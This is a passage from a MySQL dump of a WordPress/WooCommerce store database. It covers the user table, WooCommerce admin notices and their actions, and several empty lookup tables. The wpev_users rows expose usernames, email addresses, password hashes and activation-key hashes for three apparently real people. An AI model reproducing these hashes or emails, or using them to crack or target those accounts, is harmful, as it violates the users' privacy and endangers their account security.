  `ID` bigint(20) unsigned NOT NULL AUTO_INCREMENT,
  `user_login` varchar(60) NOT NULL DEFAULT '',
  `user_pass` varchar(255) NOT NULL DEFAULT '',
  `user_nicename` varchar(50) NOT NULL DEFAULT '',
  `user_email` varchar(100) NOT NULL DEFAULT '',
  `user_url` varchar(100) NOT NULL DEFAULT '',
  `user_registered` datetime NOT NULL DEFAULT '0000-00-00 00:00:00',
  `user_activation_key` varchar(255) NOT NULL DEFAULT '',
  `user_status` int(11) NOT NULL DEFAULT 0,
  `display_name` varchar(250) NOT NULL DEFAULT '',
  PRIMARY KEY (`ID`),
  KEY `user_login_key` (`user_login`),
  KEY `user_nicename` (`user_nicename`),
  KEY `user_email` (`user_email`)
) ENGINE=InnoDB AUTO_INCREMENT=4 DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_unicode_ci;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `wpev_users`
--

LOCK TABLES `wpev_users` WRITE;
/*!40000 ALTER TABLE `wpev_users` DISABLE KEYS */;
INSERT INTO `wpev_users` VALUES (1,'xardyx2','$P$Bb9wCNWp.VilWWxoTzYlZ.Laeovq7g0','xardyx2','ardy@futuremediatrix.com','https://bauhaus.futuremediatrix.com','2022-11-14 02:46:32','',0,'xardyx2'),(2,'ivan','$P$BYthFCyzG2hvbv6GmLB/5H7MFCWfnr/','ivan','ivan.fatur@futuremediatrix.com','','2023-05-12 08:50:40','1683881440:$P$BgA7F/iULVaqt1VJdFBXqPlJ6kvobx.',0,'ivan'),(3,'thomas','$P$Bh6vmC1CPzPEoe.7Sd.Y3ge2tlBz6r0','thomas','thomas@futuremediatrix.com','','2023-09-22 08:14:52','1695370492:$P$Bj/BLLh3uN41hercTE9IhnjF.D6WnA1',0,'Thomas Joseph -');
/*!40000 ALTER TABLE `wpev_users` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `wpev_wc_admin_note_actions`
--

DROP TABLE IF EXISTS `wpev_wc_admin_note_actions`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `wpev_wc_admin_note_actions` (
  `action_id` bigint(20) unsigned NOT NULL AUTO_INCREMENT,
  `note_id` bigint(20) unsigned NOT NULL,
  `name` varchar(255) NOT NULL,
  `label` varchar(255) NOT NULL,
  `query` longtext NOT NULL,
  `status` varchar(255) NOT NULL,
  `actioned_text` varchar(255) NOT NULL,
  `nonce_action` varchar(255) DEFAULT NULL,
  `nonce_name` varchar(255) DEFAULT NULL,
  PRIMARY KEY (`action_id`),
  KEY `note_id` (`note_id`)
) ENGINE=InnoDB AUTO_INCREMENT=159 DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_unicode_520_ci;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `wpev_wc_admin_note_actions`
--

LOCK TABLES `wpev_wc_admin_note_actions` WRITE;
/*!40000 ALTER TABLE `wpev_wc_admin_note_actions` DISABLE KEYS */;
INSERT INTO `wpev_wc_admin_note_actions` VALUES (40,34,'notify-refund-returns-page','Edit page','https://bauhaus.futuremediatrix.com/wp-admin/post.php?post=16&action=edit','actioned','',NULL,NULL),(41,35,'connect','Connect','?page=wc-addons&section=helper','unactioned','',NULL,NULL),(120,1,'browse_extensions','Browse extensions','https://bauhaus.futuremediatrix.com/wp-admin/admin.php?page=wc-addons','unactioned','',NULL,NULL),(121,2,'wayflyer_bnpl_q4_2021','Level up with funding','https://woocommerce.com/products/wayflyer/?utm_source=inbox_note&utm_medium=product&utm_campaign=wayflyer_bnpl_q4_2021','actioned','',NULL,NULL),(122,3,'wc_shipping_mobile_app_usps_q4_2021','Get WooCommerce Shipping','https://woocommerce.com/woocommerce-shipping/?utm_source=inbox_note&utm_medium=product&utm_campaign=wc_shipping_mobile_app_usps_q4_2021','actioned','',NULL,NULL),(123,4,'learn-more','Learn more','https://docs.woocommerce.com/document/woocommerce-shipping-and-tax/?utm_source=inbox','unactioned','',NULL,NULL),(124,5,'learn-more','Learn more','https://woocommerce.com/posts/ecommerce-shipping-solutions-guide/?utm_source=inbox_note&utm_medium=product&utm_campaign=learn-more','actioned','',NULL,NULL),(125,6,'optimizing-the-checkout-flow','Learn more','https://woocommerce.com/posts/optimizing-woocommerce-checkout?utm_source=inbox_note&utm_medium=product&utm_campaign=optimizing-the-checkout-flow','actioned','',NULL,NULL),(126,7,'qualitative-feedback-from-new-users','Share feedback','https://automattic.survey.fm/wc-pay-new','actioned','',NULL,NULL),(127,8,'share-feedback','Share feedback','http://automattic.survey.fm/paypal-feedback','unactioned','',NULL,NULL),(128,9,'get-started','Get started','https://woocommerce.com/products/google-listings-and-ads?utm_source=inbox_note&utm_medium=product&utm_campaign=get-started','actioned','',NULL,NULL),(129,10,'update-wc-subscriptions-3-0-15','View latest version','https://bauhaus.futuremediatrix.com/wp-admin/&page=wc-addons&section=helper','actioned','',NULL,NULL),(130,11,'update-wc-core-5-4-0','How to update WooCommerce','https://docs.woocommerce.com/document/how-to-update-woocommerce/','actioned','',NULL,NULL),(131,14,'ppxo-pps-install-paypal-payments-1','View upgrade guide','https://docs.woocommerce.com/document/woocommerce-paypal-payments/paypal-payments-upgrade-guide/','actioned','',NULL,NULL),(132,15,'ppxo-pps-install-paypal-payments-2','View upgrade guide','https://docs.woocommerce.com/document/woocommerce-paypal-payments/paypal-payments-upgrade-guide/','actioned','',NULL,NULL),(133,16,'learn-more','Learn more','https://woocommerce.com/posts/critical-vulnerability-detected-july-2021/?utm_source=inbox_note&utm_medium=product&utm_campaign=learn-more','unactioned','',NULL,NULL),(134,16,'dismiss','Dismiss','','actioned','',NULL,NULL),(135,17,'learn-more','Learn more','https://woocommerce.com/posts/critical-vulnerability-detected-july-2021/?utm_source=inbox_note&utm_medium=product&utm_campaign=learn-more','unactioned','',NULL,NULL),(136,17,'dismiss','Dismiss','','actioned','',NULL,NULL),(137,18,'learn-more','Learn more','https://woocommerce.com/posts/critical-vulnerability-detected-july-2021/?utm_source=inbox_note&utm_medium=product&utm_campaign=learn-more','unactioned','',NULL,NULL),(138,18,'dismiss','Dismiss','','actioned','',NULL,NULL),(139,19,'learn-more','Learn more','https://woocommerce.com/posts/critical-vulnerability-detected-july-2021/?utm_source=inbox_note&utm_medium=product&utm_campaign=learn-more','unactioned','',NULL,NULL),(140,19,'dismiss','Dismiss','','actioned','',NULL,NULL),(141,20,'share-feedback','Share feedback','https://automattic.survey.fm/store-management','unactioned','',NULL,NULL),(142,21,'share-navigation-survey-feedback','Share feedback','https://automattic.survey.fm/feedback-on-woocommerce-navigation','actioned','',NULL,NULL),(143,22,'learn-more','Learn more','https://developer.woocommerce.com/2022/03/10/woocommerce-3-5-10-6-3-1-security-releases/','unactioned','',NULL,NULL),(144,22,'woocommerce-core-paypal-march-2022-dismiss','Dismiss','','actioned','',NULL,NULL),(145,23,'learn-more','Learn more','https://developer.woocommerce.com/2022/03/10/woocommerce-3-5-10-6-3-1-security-releases/','unactioned','',NULL,NULL),(146,23,'dismiss','Dismiss','','actioned','',NULL,NULL),(147,24,'pinterest_03_2022_update','Update Instructions','https://woocommerce.com/document/pinterest-for-woocommerce/?utm_source=inbox_note&utm_medium=product&utm_campaign=pinterest_03_2022_update#section-3','actioned','',NULL,NULL),(148,25,'store_setup_survey_survey_q2_2022_share_your_thoughts','Tell us how it’s going','https://automattic.survey.fm/store-setup-survey-2022','actioned','',NULL,NULL),(149,26,'wc-admin-wisepad3','Grow my business offline','https://woocommerce.com/products/wisepad3-card-reader/?utm_source=inbox_note&utm_medium=product&utm_campaign=wc-admin-wisepad3','actioned','',NULL,NULL),(150,27,'learn-more','Find out more','https://developer.woocommerce.com/2022/08/09/woocommerce-payments-3-9-4-4-5-1-security-releases/','unactioned','',NULL,NULL),(151,27,'dismiss','Dismiss','','actioned','',NULL,NULL),(152,28,'learn-more','Find out more','https://developer.woocommerce.com/2022/08/09/woocommerce-payments-3-9-4-4-5-1-security-releases/','unactioned','',NULL,NULL),(153,28,'dismiss','Dismiss','','actioned','',NULL,NULL),(154,29,'shipping_category_q4_2022_click','Automate my shipping','https://woocommerce.com/product-category/woocommerce-extensions/shipping-delivery-and-fulfillment/?categoryIds=28685&collections=product&page=1&utm_source=inbox_note&utm_medium=product&utm_campaign=shipping_category_q4_2022_click','unactioned','',NULL,NULL),(155,30,'woocommerce_admin_deprecation_q4_2022','Deactivate WooCommerce Admin','https://bauhaus.futuremediatrix.com/wp-admin/plugins.php','actioned','',NULL,NULL),(156,31,'tiktok-targeted-q4-2022-click','Launch a campaign','https://woocommerce.com/products/tiktok-for-woocommerce/?utm_source=inbox_note&utm_medium=product&utm_campaign=tiktok-targeted-q4-2022-click','unactioned','',NULL,NULL),(157,32,'paypal_paylater_g3_q4_22','Install PayPal Payments','https://woocommerce.com/products/woocommerce-paypal-payments/?utm_source=inbox_note&utm_medium=product&utm_campaign=paypal_paylater_g3_q4_22','unactioned','',NULL,NULL),(158,33,'paypal_paylater_g2_q4_22','Install PayPal Payments','https://woocommerce.com/products/woocommerce-paypal-payments/?utm_source=inbox_note&utm_medium=product&utm_campaign=paypal_paylater_g2_q4_22','unactioned','',NULL,NULL);
/*!40000 ALTER TABLE `wpev_wc_admin_note_actions` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `wpev_wc_admin_notes`
--

DROP TABLE IF EXISTS `wpev_wc_admin_notes`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `wpev_wc_admin_notes` (
  `note_id` bigint(20) unsigned NOT NULL AUTO_INCREMENT,
  `name` varchar(255) NOT NULL,
  `type` varchar(20) NOT NULL,
  `locale` varchar(20) NOT NULL,
  `title` longtext NOT NULL,
  `content` longtext NOT NULL,
  `content_data` longtext DEFAULT NULL,
  `status` varchar(200) NOT NULL,
  `source` varchar(200) NOT NULL,
  `date_created` datetime NOT NULL DEFAULT '0000-00-00 00:00:00',
  `date_reminder` datetime DEFAULT NULL,
  `is_snoozable` tinyint(1) NOT NULL DEFAULT 0,
  `layout` varchar(20) NOT NULL DEFAULT '',
  `image` varchar(200) DEFAULT NULL,
  `is_deleted` tinyint(1) NOT NULL DEFAULT 0,
  `is_read` tinyint(1) NOT NULL DEFAULT 0,
  `icon` varchar(200) NOT NULL DEFAULT 'info',
  PRIMARY KEY (`note_id`)
) ENGINE=InnoDB AUTO_INCREMENT=36 DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_unicode_520_ci;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `wpev_wc_admin_notes`
--

LOCK TABLES `wpev_wc_admin_notes` WRITE;
/*!40000 ALTER TABLE `wpev_wc_admin_notes` DISABLE KEYS */;
INSERT INTO `wpev_wc_admin_notes` VALUES (1,'new_in_app_marketplace_2021','info','en_US','Customize your store with extensions','Check out our NEW Extensions tab to see our favorite extensions for customizing your store, and discover the most popular extensions in the WooCommerce Marketplace.','{}','unactioned','woocommerce.com','2022-11-14 03:28:38',NULL,0,'plain','',0,0,'info'),(2,'wayflyer_bnpl_q4_2021','marketing','en_US','Grow your business with funding through Wayflyer','Fast, flexible financing to boost cash flow and help your business grow – one fee, no interest rates, penalties, equity, or personal guarantees. Based on your store’s performance, Wayflyer provides funding and analytical insights to invest in your business.','{}','pending','woocommerce.com','2022-11-14 03:28:38',NULL,0,'plain','',0,0,'info'),(3,'wc_shipping_mobile_app_usps_q4_2021','marketing','en_US','Print and manage your shipping labels with WooCommerce Shipping and the WooCommerce Mobile App','Save time by printing, purchasing, refunding, and tracking shipping labels generated by <a href=\"https://woocommerce.com/woocommerce-shipping/\">WooCommerce Shipping</a> – all directly from your mobile device!','{}','pending','woocommerce.com','2022-11-14 03:28:38',NULL,0,'plain','',0,0,'info'),(4,'woocommerce-services','info','en_US','WooCommerce Shipping & Tax','WooCommerce Shipping &amp; Tax helps get your store \"ready to sell\" as quickly as possible. You create your products. We take care of tax calculation, payment processing, and shipping label printing! Learn more about the extension that you just installed.','{}','pending','woocommerce.com','2022-11-14 03:28:38',NULL,0,'plain','',0,0,'info'),(5,'your-first-product','info','en_US','Your first product','That’s huge! You’re well on your way to building a successful online store — now it’s time to think about how you’ll fulfill your orders.<br /><br />Read our shipping guide to learn best practices and options for putting together your shipping strategy. And for WooCommerce stores in the United States, you can print discounted shipping labels via USPS with <a href=\"https://href.li/?https://woocommerce.com/shipping\" target=\"_blank\">WooCommerce Shipping</a>.','{}','pending','woocommerce.com','2022-11-14 03:28:38',NULL,0,'plain','',0,0,'info'),(6,'wc-admin-optimizing-the-checkout-flow','info','en_US','Optimizing the checkout flow','It’s crucial to get your store’s checkout as smooth as possible to avoid losing sales. Let’s take a look at how you can optimize the checkout experience for your shoppers.','{}','pending','woocommerce.com','2022-11-14 03:28:38',NULL,0,'plain','',0,0,'info'),(7,'wc-payments-qualitative-feedback','info','en_US','WooCommerce Payments setup - let us know what you think','Congrats on enabling WooCommerce Payments for your store. Please share your feedback in this 2 minute survey to help us improve the setup process.','{}','pending','woocommerce.com','2022-11-14 03:28:38',NULL,0,'plain','',0,0,'info'),(8,'share-your-feedback-on-paypal','info','en_US','Share your feedback on PayPal','Share your feedback in this 2 minute survey about how we can make the process of accepting payments more useful for your store.','{}','pending','woocommerce.com','2022-11-14 03:28:38',NULL,0,'plain','',0,0,'info'),(9,'google_listings_and_ads_install','marketing','en_US','Drive traffic and sales with Google','Reach online shoppers to drive traffic and sales for your store by showcasing products across Google, for free or with ads.','{}','pending','woocommerce.com','2022-11-14 03:28:38',NULL,0,'plain','',0,0,'info'),(10,'wc-subscriptions-security-update-3-0-15','info','en_US','WooCommerce Subscriptions security update!','We recently released an important security update to WooCommerce Subscriptions. To ensure your site’s data is protected, please upgrade <strong>WooCommerce Subscriptions to version 3.0.15</strong> or later.<br /><br />Click the button below to view and update to the latest Subscriptions version, or log in to <a href=\"https://woocommerce.com/my-dashboard\">WooCommerce.com Dashboard</a> and navigate to your <strong>Downloads</strong> page.<br /><br />We recommend always using the latest version of WooCommerce Subscriptions, and other software running on your site, to ensure maximum security.<br /><br />If you have any questions we are here to help — just <a href=\"https://woocommerce.com/my-account/create-a-ticket/\">open a ticket</a>.','{}','pending','woocommerce.com','2022-11-14 03:28:38',NULL,0,'plain','',0,0,'info'),(11,'woocommerce-core-update-5-4-0','info','en_US','Update to WooCommerce 5.4.1 now','WooCommerce 5.4.1 addresses a checkout issue discovered in WooCommerce 5.4. We recommend upgrading to WooCommerce 5.4.1 as soon as possible.','{}','pending','woocommerce.com','2022-11-14 03:28:38',NULL,0,'plain','',0,0,'info'),(12,'wcpay-promo-2020-11','marketing','en_US','wcpay-promo-2020-11','wcpay-promo-2020-11','{}','pending','woocommerce.com','2022-11-14 03:28:38',NULL,0,'plain','',0,0,'info'),(13,'wcpay-promo-2020-12','marketing','en_US','wcpay-promo-2020-12','wcpay-promo-2020-12','{}','pending','woocommerce.com','2022-11-14 03:28:38',NULL,0,'plain','',0,0,'info'),(14,'ppxo-pps-upgrade-paypal-payments-1','info','en_US','Get the latest PayPal extension for WooCommerce','Heads up! There’s a new PayPal on the block!<br /><br />Now is a great time to upgrade to our latest <a href=\"https://woocommerce.com/products/woocommerce-paypal-payments/\" target=\"_blank\">PayPal extension</a> to continue to receive support and updates with PayPal.<br /><br />Get access to a full suite of PayPal payment methods, extensive currency and country coverage, and pay later options with the all-new PayPal extension for WooCommerce.','{}','pending','woocommerce.com','2022-11-14 03:28:38',NULL,0,'plain','',0,0,'info'),(15,'ppxo-pps-upgrade-paypal-payments-2','info','en_US','Upgrade your PayPal experience!','Get access to a full suite of PayPal payment methods, extensive currency and country coverage, offer subscription and recurring payments, and the new PayPal pay later options.<br /><br />Start using our <a href=\"https://woocommerce.com/products/woocommerce-paypal-payments/\" target=\"_blank\">latest PayPal today</a> to continue to receive support and updates.','{}','pending','woocommerce.com','2022-11-14 03:28:38',NULL,0,'plain','',0,0,'info'),(16,'woocommerce-core-sqli-july-2021-need-to-update','update','en_US','Action required: Critical vulnerabilities in WooCommerce','In response to a critical vulnerability identified on July 13, 2021, we are working with the WordPress Plugins Team to deploy software updates to stores running WooCommerce (versions 3.3 to 5.5) and the WooCommerce Blocks feature plugin (versions 2.5 to 5.5).<br /><br />Our investigation into this vulnerability is ongoing, but <strong>we wanted to let you know now about the importance of updating immediately</strong>.<br /><br />For more information on which actions you should take, as well as answers to FAQs, please urgently review our blog post detailing this issue.','{}','pending','woocommerce.com','2022-11-14 03:28:38',NULL,0,'plain','',0,0,'info'),(17,'woocommerce-blocks-sqli-july-2021-need-to-update','update','en_US','Action required: Critical vulnerabilities in WooCommerce Blocks','In response to a critical vulnerability identified on July 13, 2021, we are working with the WordPress Plugins Team to deploy software updates to stores running WooCommerce (versions 3.3 to 5.5) and the WooCommerce Blocks feature plugin (versions 2.5 to 5.5).<br /><br />Our investigation into this vulnerability is ongoing, but <strong>we wanted to let you know now about the importance of updating immediately</strong>.<br /><br />For more information on which actions you should take, as well as answers to FAQs, please urgently review our blog post detailing this issue.','{}','pending','woocommerce.com','2022-11-14 03:28:38',NULL,0,'plain','',0,0,'info'),(18,'woocommerce-core-sqli-july-2021-store-patched','update','en_US','Solved: Critical vulnerabilities patched in WooCommerce','In response to a critical vulnerability identified on July 13, 2021, we worked with the WordPress Plugins Team to deploy software updates to stores running WooCommerce (versions 3.3 to 5.5) and the WooCommerce Blocks feature plugin (versions 2.5 to 5.5).<br /><br /><strong>Your store has been updated to the latest secure version(s)</strong>. For more information and answers to FAQs, please review our blog post detailing this issue.','{}','pending','woocommerce.com','2022-11-14 03:28:38',NULL,0,'plain','',0,0,'info'),(19,'woocommerce-blocks-sqli-july-2021-store-patched','update','en_US','Solved: Critical vulnerabilities patched in WooCommerce Blocks','In response to a critical vulnerability identified on July 13, 2021, we worked with the WordPress Plugins Team to deploy software updates to stores running WooCommerce (versions 3.3 to 5.5) and the WooCommerce Blocks feature plugin (versions 2.5 to 5.5).<br /><br /><strong>Your store has been updated to the latest secure version(s)</strong>. For more information and answers to FAQs, please review our blog post detailing this issue.','{}','pending','woocommerce.com','2022-11-14 03:28:38',NULL,0,'plain','',0,0,'info'),(20,'habit-moment-survey','marketing','en_US','We’re all ears! Share your experience so far with WooCommerce','We’d love your input to shape the future of WooCommerce together. Feel free to share any feedback, ideas or suggestions that you have.','{}','pending','woocommerce.com','2022-11-14 03:28:38',NULL,0,'plain','',0,0,'info'),(21,'ecomm-wc-navigation-survey','info','en_US','We’d like your feedback on the WooCommerce navigation','We’re making improvements to the WooCommerce navigation and would love your feedback. Share your experience in this 2 minute survey.','{}','pending','woocommerce.com','2022-11-14 03:28:38',NULL,0,'plain','',0,0,'info'),(22,'woocommerce-core-paypal-march-2022-updated','update','en_US','Security auto-update of WooCommerce','<strong>Your store has been updated to the latest secure version of WooCommerce</strong>. We worked with WordPress to deploy PayPal Standard security updates for stores running WooCommerce (version 3.5 to 6.3). It’s recommended to disable PayPal Standard, and use <a href=\"https://woocommerce.com/products/woocommerce-paypal-payments/\" target=\"_blank\">PayPal Payments</a> to accept PayPal.','{}','pending','woocommerce.com','2022-11-14 03:28:38',NULL,0,'plain','',0,0,'info'),(23,'woocommerce-core-paypal-march-2022-updated-nopp','update','en_US','Security auto-update of WooCommerce','<strong>Your store has been updated to the latest secure version of WooCommerce</strong>. We worked with WordPress to deploy security updates related to PayPal Standard payment gateway for stores running WooCommerce (version 3.5 to 6.3).','{}','pending','woocommerce.com','2022-11-14 03:28:38',NULL,0,'plain','',0,0,'info'),(24,'pinterest_03_2022_update','marketing','en_US','Your Pinterest for WooCommerce plugin is out of date!','Update to the latest version of Pinterest for WooCommerce to continue using this plugin and keep your store connected with Pinterest. To update, visit <strong>Plugins &gt; Installed Plugins</strong>, and click on “update now” under Pinterest for WooCommerce.','{}','pending','woocommerce.com','2022-11-14 03:28:38',NULL,0,'plain','',0,0,'info'),(25,'store_setup_survey_survey_q2_2022','survey','en_US','How is your store setup going?','Our goal is to make sure you have all the right tools to start setting up your store in the smoothest way possible.\r\nWe’d love to know if we hit our mark and how we can improve. To collect your thoughts, we made a 2-minute survey.','{}','pending','woocommerce.com','2022-11-14 03:28:38',NULL,0,'plain','',0,0,'info'),(26,'wc-admin-wisepad3','marketing','en_US','Take your business on the go in Canada with WooCommerce In-Person Payments','Quickly create new orders, accept payment in person for orders placed online, and automatically sync your inventory – no matter where your business takes you. With WooCommerce In-Person Payments and the WisePad 3 card reader, you can bring the power of your store anywhere.','{}','pending','woocommerce.com','2022-11-14 03:28:38',NULL,0,'plain','',0,0,'info'),(27,'woocommerce-payments-august-2022-need-to-update','update','en_US','Action required: Please update WooCommerce Payments','An updated secure version of WooCommerce Payments is available – please ensure that you’re using the latest patch version. For more information on what action you need to take, please review the article below.','{}','pending','woocommerce.com','2022-11-14 03:28:38',NULL,0,'plain','',0,0,'info'),(28,'woocommerce-payments-august-2022-store-patched','update','en_US','WooCommerce Payments has been automatically updated','You’re now running the latest secure version of WooCommerce Payments. We’ve worked with the WordPress Plugins team to deploy a security update to stores running WooCommerce Payments (version 3.9 to 4.5). For further information, please review the article below.','{}','pending','woocommerce.com','2022-11-14 03:28:38',NULL,0,'plain','',0,0,'info'),(29,'shipping_category_q4_2022','marketing','en_US','Save time on shipping','Is your store all set to ship? Save valuable time (and money!) by automating your fulfillment process for the busiest shopping season. Explore our range of trusted shipping partners to get started.','{}','pending','woocommerce.com','2022-11-14 03:28:38',NULL,0,'plain','',0,0,'info'),(30,'woocommerce_admin_deprecation_q4_2022','info','en_US','WooCommerce Admin is part of WooCommerce!','To make sure your store continues to run smoothly, check that WooCommerce is up-to-date – at least version 6.5 – and then disable the WooCommerce Admin plugin.','{}','pending','woocommerce.com','2022-11-14 03:28:38',NULL,0,'plain','',0,0,'info'),(31,'tiktok-targeted-q4-2022','marketing','en_US','Get $200 in ad credit from TikTok after you spend $20 on your first campaign','Reach one billion shoppers with TikTok for WooCommerce this holiday season! Sync your product catalog, capture insights, and create ad campaigns right from your dashboard. Connect your store today to unlock this limited time offer! <a href=\"https://ads.tiktok.com/help/article?aid=10011326\">Terms &amp; conditions apply</a>.','{}','pending','woocommerce.com','2022-11-14 03:28:38',NULL,0,'plain','',0,0,'info'),(32,'paypal_paylater_g3_q4_22','marketing','en_US','Turn browsers into buyers with Pay Later','Add PayPal at checkout, plus give customers a buy now, pay later option from the name they trust. With Pay in 4 &amp; Pay Monthly, available in PayPal Payments, you get paid up front while letting customers spread their payments over time. Boost your average order value and convert more sales – at no extra cost to you.','{}','pending','woocommerce.com','2022-11-14 03:28:38',NULL,0,'plain','',0,0,'info'),(33,'paypal_paylater_g2_q4_22','marketing','en_US','Upgrade to PayPal Payments to offer Pay Later at checkout','PayPal Pay Later is included in PayPal Payments at no additional cost to you. Customers can spread their payments over time while you get paid up front. \r\nThere’s never been a better time to upgrade your PayPal plugin. Simply download it and connect with a PayPal Business account.','{}','pending','woocommerce.com','2022-11-14 03:28:38',NULL,0,'plain','',0,0,'info'),(34,'wc-refund-returns-page','info','en_US','Setup a Refund and Returns Policy page to boost your store\'s credibility.','We have created a sample draft Refund and Returns Policy page for you. Please have a look and update it to fit your store.','{}','unactioned','woocommerce-core','2022-11-14 03:28:39',NULL,0,'plain','',0,0,'info'),(35,'wc-admin-wc-helper-connection','info','en_US','Connect to WooCommerce.com','Connect to get important product notifications and updates.','{}','unactioned','woocommerce-admin','2022-11-14 03:28:39',NULL,0,'plain','',0,0,'info');
/*!40000 ALTER TABLE `wpev_wc_admin_notes` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `wpev_wc_category_lookup`
--

DROP TABLE IF EXISTS `wpev_wc_category_lookup`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `wpev_wc_category_lookup` (
  `category_tree_id` bigint(20) unsigned NOT NULL,
  `category_id` bigint(20) unsigned NOT NULL,
  PRIMARY KEY (`category_tree_id`,`category_id`)
) ENGINE=InnoDB DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_unicode_520_ci;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `wpev_wc_category_lookup`
--

LOCK TABLES `wpev_wc_category_lookup` WRITE;
/*!40000 ALTER TABLE `wpev_wc_category_lookup` DISABLE KEYS */;
INSERT INTO `wpev_wc_category_lookup` VALUES (23,23),(39,39),(41,41),(42,42),(47,47),(50,50);
/*!40000 ALTER TABLE `wpev_wc_category_lookup` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `wpev_wc_customer_lookup`
--

DROP TABLE IF EXISTS `wpev_wc_customer_lookup`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `wpev_wc_customer_lookup` (
  `customer_id` bigint(20) unsigned NOT NULL AUTO_INCREMENT,
  `user_id` bigint(20) unsigned DEFAULT NULL,
  `username` varchar(60) NOT NULL DEFAULT '',
  `first_name` varchar(255) NOT NULL,
  `last_name` varchar(255) NOT NULL,
  `email` varchar(100) DEFAULT NULL,
  `date_last_active` timestamp NULL DEFAULT NULL,
  `date_registered` timestamp NULL DEFAULT NULL,
  `country` char(2) NOT NULL DEFAULT '',
  `postcode` varchar(20) NOT NULL DEFAULT '',
  `city` varchar(100) NOT NULL DEFAULT '',
  `state` varchar(100) NOT NULL DEFAULT '',
  PRIMARY KEY (`customer_id`),
  UNIQUE KEY `user_id` (`user_id`),
  KEY `email` (`email`)
) ENGINE=InnoDB DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_unicode_520_ci;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `wpev_wc_customer_lookup`
--

LOCK TABLES `wpev_wc_customer_lookup` WRITE;
/*!40000 ALTER TABLE `wpev_wc_customer_lookup` DISABLE KEYS */;
/*!40000 ALTER TABLE `wpev_wc_customer_lookup` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `wpev_wc_download_log`
--

DROP TABLE IF EXISTS `wpev_wc_download_log`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `wpev_wc_download_log` (
  `download_log_id` bigint(20) unsigned NOT NULL AUTO_INCREMENT,
  `timestamp` datetime NOT NULL,
  `permission_id` bigint(20) unsigned NOT NULL,
  `user_id` bigint(20) unsigned DEFAULT NULL,
  `user_ip_address` varchar(100) DEFAULT '',
  PRIMARY KEY (`download_log_id`),
  KEY `permission_id` (`permission_id`),
  KEY `timestamp` (`timestamp`)
) ENGINE=InnoDB DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_unicode_520_ci;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `wpev_wc_download_log`
--

LOCK TABLES `wpev_wc_download_log` WRITE;
/*!40000 ALTER TABLE `wpev_wc_download_log` DISABLE KEYS */;
/*!40000 ALTER TABLE `wpev_wc_download_log` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `wpev_wc_order_coupon_lookup`
--

DROP TABLE IF EXISTS `wpev_wc_order_coupon_lookup`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `wpev_wc_order_coupon_lookup` (
  `order_id` bigint(20) unsigned NOT NULL,
  `coupon_id` bigint(20) NOT NULL,
  `date_created` datetime NOT NULL DEFAULT '0000-00-00 00:00:00',
  `discount_amount` double NOT NULL DEFAULT 0,
  PRIMARY KEY (`order_id`,`coupon_id`),
  KEY `coupon_id` (`coupon_id`),
  KEY `date_created` (`date_created`)
) ENGINE=InnoDB DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_unicode_520_ci;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `wpev_wc_order_coupon_lookup`
--

LOCK TABLES `wpev_wc_order_coupon_lookup` WRITE;
/*!40000 ALTER TABLE `wpev_wc_order_coupon_lookup` DISABLE KEYS */;
/*!40000 ALTER TABLE `wpev_wc_order_coupon_lookup` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `wpev_wc_order_product_lookup`
--

DROP TABLE IF EXISTS `wpev_wc_order_product_lookup`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `wpev_wc_order_product_lookup` (
  `order_item_id` bigint(20) unsigned NOT NULL,
  `order_id` bigint(20) unsigned NOT NULL,
  `product_id` bigint(20) unsigned NOT NULL,
  `variation_id` bigint(20) unsigned NOT NULL,
  `customer_id` bigint(20) unsigned DEFAULT NULL,
  `date_created` datetime NOT NULL DEFAULT '0000-00-00 00:00:00',
  `product_qty` int(11) NOT NULL,
  `product_net_revenue` double NOT NULL DEFAULT 0,
  `product_gross_revenue` double NOT NULL DEFAULT 0,
  `coupon_amount` double NOT NULL DEFAULT 0,
  `tax_amount` double NOT NULL DEFAULT 0,
  `shipping_amount` double NOT NULL DEFAULT 0,
  `shipping_tax_amount` double NOT NULL DEFAULT 0,
  PRIMARY KEY (`order_item_id`),
  KEY `order_id` (`order_id`),
  KEY `product_id` (`product_id`),
  KEY `customer_id` (`customer_id`),
  KEY `date_created` (`date_created`)
) ENGINE=InnoDB DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_unicode_520_ci;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `wpev_wc_order_product_lookup`
--

LOCK TABLES `wpev_wc_order_product_lookup` WRITE;
/*!40000 ALTER TABLE `wpev_wc_order_product_lookup` DISABLE KEYS */;
